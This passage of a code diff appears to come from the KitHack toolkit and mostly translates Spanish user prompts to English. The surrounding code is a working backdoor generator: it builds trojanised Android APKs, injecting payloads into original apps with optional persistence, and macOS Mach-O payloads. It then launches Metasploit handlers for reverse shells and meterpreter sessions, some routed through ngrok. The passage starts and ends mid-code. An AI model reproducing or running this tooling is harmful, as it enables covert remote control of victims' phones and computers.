{2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -3039,24 +3029,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3075,7 +3065,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -3091,24 +3081,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3119,7 +3109,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) @@ -3155,39 +3145,39 @@ def main(): time.sleep(4) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) + print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -3209,7 +3199,7 @@ def main(): Tk().withdraw() icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") @@ -3246,30 +3236,30 @@ def main(): time.sleep(4) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -3285,24 +3275,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3321,7 +3311,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -3337,24 +3327,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3365,7 +3355,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) @@ -3401,46 +3391,46 @@ def main(): time.sleep(4) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) + print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -3460,7 +3450,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3468,24 +3458,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.macho'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3493,7 +3483,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3501,24 +3491,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.macho'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3526,7 +3516,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3534,24 +3524,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.macho'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3559,7 +3549,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3567,24 +3557,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.macho'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3592,7 +3582,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3600,24 +3590,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.macho'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - 